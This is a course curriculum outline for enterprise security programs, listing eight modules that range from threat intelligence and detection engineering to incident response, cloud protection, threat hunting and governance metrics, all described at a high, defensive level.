Description

This curriculum spans the design and operationalization of security programs with the breadth and technical specificity seen in multi-workshop threat engineering engagements, covering intelligence integration, detection architecture, incident orchestration, identity controls, cloud workload protection, third-party risk, proactive hunting, and governance practices used in mature security organizations.

Module 1: Threat Landscape Analysis and Intelligence Integration

Selecting and validating threat intelligence feeds based on relevance to industry sector, geographic operations, and adversary TTPs.
Mapping external threat data to internal telemetry using MITRE ATT&CK to prioritize detection engineering efforts.
Establishing thresholds for automated ingestion of IOCs to prevent SIEM performance degradation.
Deciding whether to build, buy, or partner for threat intelligence capabilities based on team maturity and budget.
Integrating threat intelligence into vulnerability management workflows to adjust patching urgency.
Designing processes to deconflict false positives when correlating open-source threat reports with internal alerts.

Module 2: Detection Engineering and Security Analytics

Developing detection rules that balance sensitivity and specificity to reduce alert fatigue without missing stealthy attacks.
Implementing sigma rules across heterogeneous log sources while accounting for schema normalization challenges.
Choosing between on-premise, cloud-native, or hybrid SIEM architectures based on data residency and scalability needs.
Validating detection logic using purple team exercises and historical breach data.
Managing retention policies for raw logs versus aggregated telemetry to meet forensic requirements and cost constraints.
Integrating EDR telemetry with network detection systems to enable cross-domain correlation.

Module 3: Incident Response Orchestration and Playbook Design

Defining escalation paths and decision gates for declaring incidents based on impact and attacker dwell time.
Customizing SOAR playbooks to reflect organizational IT topology and third-party service dependencies.
Documenting manual override procedures for automated containment actions to prevent business disruption.
Coordinating communication protocols between legal, PR, and technical teams during active breaches.
Establishing forensic data collection standards that preserve chain of custody for potential litigation.
Conducting tabletop exercises with executive stakeholders to validate incident response decision timelines.

Module 4: Identity and Access Attack Surface Management

Implementing just-in-time privileged access to reduce standing admin privileges across hybrid environments.
Enforcing MFA across legacy applications using reverse proxy solutions where native support is absent.
Monitoring for anomalous authentication patterns indicative of password spray or Kerberoasting attacks.
Deciding whether to federate identity with third parties or maintain isolated trust boundaries.
Managing service account lifecycle and credential rotation in containerized workloads.
Responding to compromised identity providers by activating offline recovery processes and alternate auth channels.

Module 5: Cloud Security Posture and Workload Protection

Enforcing cloud network segmentation using security groups and NSGs across multi-account AWS or Azure environments.
Implementing runtime protection for serverless functions to detect and block malicious execution.
Configuring CSPM tools to detect misconfigurations in IaC templates prior to deployment.
Managing shared responsibility model gaps in SaaS applications where tenant controls are limited.
Securing container images by integrating vulnerability scanning into CI/CD pipelines.
Responding to public cloud storage bucket exposure by automating detection and access revocation.

Module 6: Supply Chain and Third-Party Risk Mitigation

Assessing software bill of materials (SBOM) completeness and accuracy from vendors during procurement.
Requiring third parties to provide evidence of breach notification timelines and logging access.
Implementing network microsegmentation to restrict lateral movement from compromised vendor connections.
Conducting technical audits of vendor environments when contractual access is permitted.
Managing risk acceptance decisions for critical vendors with substandard security practices.
Establishing telemetry-sharing agreements with key partners to improve threat visibility.

Module 7: Threat Hunting and Adversary Emulation

Scoping threat hunts based on recent IOCs, business context, and system criticality.
Developing custom queries to detect living-off-the-land binaries (LOLBins) in endpoint logs.
Using adversary emulation plans to test detection coverage without disrupting production systems.
Documenting hunting hypotheses and findings in structured formats for knowledge reuse.
Coordinating red team activities with change management to avoid triggering false outages.
Measuring detection gap closure rates over time to demonstrate security program improvement.

Module 8: Governance, Metrics, and Continuous Improvement

Defining KPIs such as mean time to detect (MTTD) and mean time to respond (MTTR) with realistic baselines.
Aligning security metrics with business risk appetite for executive reporting and budget justification.
Conducting post-incident reviews to update controls and prevent recurrence without assigning blame.
Managing audit findings related to control deficiencies while prioritizing remediation based on exploitability.
Updating security policies to reflect changes in regulatory requirements and threat behaviors.
Rotating detection signatures and defensive configurations to counter attacker adaptation.